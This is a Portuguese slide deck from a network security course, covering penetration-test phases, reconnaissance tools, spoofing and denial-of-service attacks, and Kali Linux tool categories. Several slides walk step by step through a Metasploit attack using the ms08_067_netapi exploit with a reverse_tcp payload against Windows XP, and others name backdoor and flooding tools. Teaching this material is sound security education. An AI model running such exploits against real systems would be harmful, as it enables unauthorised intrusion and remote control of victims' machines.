Você está na página 1de 49

Material didático ESR

Sessão de aprendizagem 1
Modelo de conteúdo do material didático
Segurança de redes e sistemas

Capítulo 2

Explorando Vulnerabilidades em Redes


Tópicos abordados

Introdução à técnicas de invasão


Testes de penetração
Ferramentas
Levantamento de Vulnerabilidades
Ataques de negação de Serviço
Exploração de Vulnerabilidades

3 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Finalidade de um teste de penetração


Apurar as dificuldades de se invadir um rede
Levantamento de Vulnerabilidades
Determinar um panorama da segurança de uma rede de computadores

3 Tipos
Teste de penetração Zero (BlackBox)
Teste de penetração Parcial (GreyBox)
Teste de penetração Total (WhiteBox)
4 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

ISECOM

Open Source Security Testing Methodology


Manual (OSSTMM)

http://www.isecom.org/mirror/OSSTMM.3.pdf

5 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Figura 2.1a – Diagrama de metodologia de pentest (ref. Offensive Security)


6 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Passivo

Levantamento de
Informações

Ativo

7 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Google, Facebook,
LinkedIN

Levantamento de
Informações Passivo Netcraft

Whois

8 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Enumeração DNS

Levantamento de
Informações Ativo Port scanning

Enumeração SMB,
SNMP, SMTP

9 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

nmap Nikto

Scanning de
vulnerabilidades Nessus OpenVAS

Qualys Cloud
Nexpose
Platform

10 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Aplicações nativas
Buffer
Fuzzing Exploits
Overflows
Exploração

Aplicações web
SQL Injections XSS / CSRF Configurações

11 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Escalada de
privilégios

Pós-exploração Ataque a senhas e


hashes

Pivoteamento /
Tunelamento

12 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Penetration Test

Fases em um teste de penetração

Apagar registros e
traços do ataque

Manutenção do
acesso

Rootkits / backdoors
em memória

13 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento ativo de informações

Packet Sniffing

Figura 2.1 - Interface de um programa de captura de pacotes.


14 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de vulnerabilidades

nmap

O Nmap é uma ferramenta de código aberto utilizada para


exploração de rede e auditoria de segurança. Ela foi
desenhada para identificar quais portas de serviço estão
abertas na máquina alvo ou em um conjunto de máquinas.
O resultado final de sua execução inclui, dependendo das
opções utilizadas, informações como versão do sistema
operacional e versão dos serviços em execução.

15 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de vulnerabilidades

nmap

Exemplos de parâmetros
-O : Realiza uma tentativa de detectar o sistema operacional

-Pn : Realiza varredura sem estágio de descoberta do host

-v : aumenta a quantidade de informação apresentada

-s<tipo> : Tipo de varredura utilizada (SYN, CONNECT, etc.)

16 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de Vulnerabilidades

hping

A ferramenta Hping é um gerador e analisador de pacotes


TCP/IP muito utilizado para atividades de auditoria, testes de
firewall e redes, sendo bastante útil para administradores e
hackers. Possui suporte para os protocolos ICMP, UDP e
TCP e permite a modificação de qualquer informação, tanto
do payload quanto do cabeçalho do pacote.

17 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de Vulnerabilidades

ARP Spoofing

Figura 2.2 - Ataque ARP Spoofing.


18 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de Vulnerabilidades

IP Spoofing

Figura 2.3 IP Spoofing.


19 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Levantamento de Vulnerabilidades

Fragmentação de pacotes IP

Figura 2.4 - Fragmentação de pacotes IP.


20 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ataques de negação de serviço

Os ataques de negação de serviço ou DoS (Denial of Service)


possuem como objetivo afetar a disponibilidade dos recursos,
impedindo que as informações sejam acessadas por usuários
legítimos.

Ataques DoS fazem com que recursos sejam explorados de maneira


agressiva, o que estressa o recurso, impedindo-o de realizar suas
tarefas básicas.

21 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ataques de negação de serviço

Ataques de syn flood

Figura 2.5 - Ataque de flooding.


22 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ataques de negação de serviço

Smurf

Figura 2.6 - Ataque Smurf.


23 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ataques de negação de serviço

Zenmap (varredura)

Figura 2.7 - Técnica da varredura.


24 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ataques de negação de serviço

Ataque DDoS

25 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Norse Attack Map [link]

26 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Digital Attack Map [link]

27 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Prevenção contra DDoS

Appliances on-
premises

Proteção na cloud

28 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Prevenção contra DDoS

Quadrante Forrester
Wave 2017

29 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Kali Linux

Sistema operacional Linux voltado para a área de segurança baseado


em software livre, produzido pela Offensive Security
Não necessita de instalação física.

Inclui o metasploit.

Mais de 300 ferramentas englobando os mais variados tipos de


ataques, exploração e levantamento de vulnerabilidades.

30 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Exploit

A palavra exploit significa literalmente explorar, e é usada comumente para se


referir a pequenos códigos de programas desenvolvidos para explorar falhas
de segurança introduzidas por erros involuntários de programação

Metasploit

O Metasploit é um framework específico para testes de penetração.

31 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit
Pode ser utilizado de três formas distintas:

No modo console, através do comando msfconsole.

No modo web, através do comando msfweb.

No modo gráfico, através do comando msfgui.

32 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit
Tipos de operação do Metasploit

Modo Web

Acessível através do
comando msfweb.
Servidor web acessível
através da porta 5555

33 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit

Tipos de operação do Metasploit

Modo Console
O mfsconsole é o metasploit em modo console, é uma forma mais
flexível de se utilizar o framework. Para iniciar o metasploit digite no
shell:
# msfconsole
será apresentado o cursor abaixo:
msf >

34 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit

Tipos de operação do Metasploit

Modo gráfico

O modo gráfico é
acionado pelo
comando msfgui

35 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit

Usando o metasploit para um ataque


Acessando o metasploit
# msfconsole
Verificando os exploits disponíveis
msf > show exploits
Informando qual exploit o sistema utilizará
msf > use windows/smb/ms08_067_netapi
Verificando os atributos exigidos
msf windows/smb/ms08_067_netapi > show options
36 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Metasploit

Opções
RHOST – Endereço do alvo
RPORT – porta do alvo
SMBPIPE – uso do nome para conexão SMB

Para setar as opções de uso digite


msf > set <opção> <valor>

37 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Payload: parte do software que permite o controle do


sistema alvo após ser explorado, um dos payloads mais
utilizados é o meterpreter
Para verificar quais payloads podemos dispor:
msf windows/smb/ms08_067_netapi > show payloads

Para o exemplo podemos utilizar o payload reverse_tcp:


msf windows/smb/ms08_067_netapi > set PAYLOAD
windows/vncinject/reverse_tcp

38 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Exploração de Vulnerabilidades

Com o comando show targets podemos visualizar quais sistemas


operacionais são vulneráveis a esse exploit
msf windows/smb/ms08_067_netapi > show targets

Neste exemplo verificamos que o Windows XP SP2 e SP3 de diversos


idiomas são vulneraveis a esses exploit. Com o comando set target
podemos informar o Sistema Operacional do alvo.

Para finalizar use o comando:


msf windows/smb/ms08_067_netapi > exploit

39 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Information gathering
Obtenção de informações sobre redes, aplicações Web, análise de
banco e redes wireless

Principais ferramentas
DNSDict6 – Enumerador de domínios de entradas DNS IPV6

Dnsmap – utilitário para criação de listas de hosts de registros DNS para um


domínio.

40 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Vulnerability Assessment

Ferramenta para avaliação de vulnerabilidades

Principais ferramentas

OpenVAS - Estrutura de vários serviços e ferramentas que oferecem uma


abrangente e poderosa solução de varredura de vulnerabilidades

Mantra – Coleção de ferramentas de código livre integrado a um navegador


Web.

41 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Exploitation tools

Ferramentas para exploração de vulnerabilidades em redes, sistemas


web, banco de dados, wireless e ferramentas de engenharia social.

Principais ferramentas
Metasploit Framework – Framework utilizado para explorar vulnerabilidades
em sistemas computacionais.

AirCrack – Ferramenta utilizada para descobrir chaves WEP e WPA em


sistemas Wireless.

42 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Privilege Escalation

Ferramentas para elevação de privilégios tais como quebra de


senhas, análise de protocolos e spoofing atacks.

Principais ferramentas
Hexinject - capaz de capturar pacotes em uma rede para obtenção de
informações e injeção de pacotes modificados

Medusa e Hydra – Ferramentas para ataques de força bruta em logins;

Hashcat e John the riper – Programa para recuperação de senhas.


43 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Maintaining Access

Ferramentas para manter o acesso disponível ao atacante, garantindo


o retorno de forma segura ao sistema atacado.

Principais ferramentas
Cymothoa - ferramenta capaz de injetar shellcode backdoor em um
processo existente.

Stunnel4 – Túnel criptográfico SSL para interligação cliente / Servidor.

Weevely – Script em python para gerar uma backdoor PHP criptografado.


44 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Reverse Engineering

Ferramentas de engenharia reversa visando a facilitar o levantamento


de informações confidenciais da rede.

Principais ferramentas

ollydbg – Depurador de análise assembler com ênfase em código binário

strace – Utilitário de depuração para Linux que pode imprimir uma lista de
chamadas de sistemas feitas pelo programa

45 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Stress Testing
Programas especialistas em testes de stress em redes de
computadores e sistemas VOIP. Essas ferramentas são capazes de
criar verdadeiras inundações de pacotes em uma rede.
Principais ferramentas
Hping – Programa para criação de pacotes TCP/IP, pode ser utilizado com ICMP, TCP e
UDP e é amplamente utilizado para ataques do tipo negação de serviço
rtpflood – programa para inundar telefones ips com pacotes UDP contendo dados RTP
IAXflood – ferramenta para criar inundação de pacotes utilizada em redes com protocolo
IAX que é usado pelo PABX asterisk.
46 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Forensics
Ferramentas de perícia forense, tais como, detecção de rootkits,
informações sobre dados armazenados desde uma rede até a
memória RAM.
Principais ferramentas
Sleuthkit – Capaz de analisar e recuperar informações em diversos tipos de partições.

Chkrootkit – Utilitário capaz de varrer um computador atrás de programas rootkits


instalados; e
Dff – Digital Foresics Framework, pacote de ferramentas open source modular que inclui
utilitários para recuperação de dados, pesquisa de provas e análises.
47 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Ferramentas Kali Linux

Reporting Tools

Ferramentas geradoras de relatórios sobre evidencias e captura de


dados feitas por programas de perícia forense.

Principais ferramentas

Recordmydesktop – Programa para capturar e filmar o desktop do usuário

Dradis – utilitário de ajuda no processo de testes de penetração. Utiliza uma


metodologia de compartilhamento de informações minimizando
oportunidades de perda de informação e sobreposição de esforços.
48 46
Segurança de redes e sistemas – Capítulo 2 (Explorando Vulnerabilidades em Redes)
Segurança de redes e sistemas

Capítulo 2

Explorando Vulnerabilidades em Redes

Você também pode gostar